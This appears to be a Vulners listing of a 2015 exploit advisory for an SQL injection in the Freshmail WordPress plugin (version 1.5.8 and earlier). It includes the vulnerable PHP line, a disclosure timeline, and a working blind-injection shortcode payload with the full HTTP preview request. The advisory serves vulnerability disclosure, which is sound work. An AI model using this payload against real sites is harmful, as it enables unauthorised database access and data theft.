Vulners
Lucene search
WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/shortcode.php, lines 27 and 120:
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
3. Proof of concept
---------------------------
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL--
5. Solution
---------------
Update to version 1.6Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2015 00:00Current
7.4High risk
Vulners AI Score7.4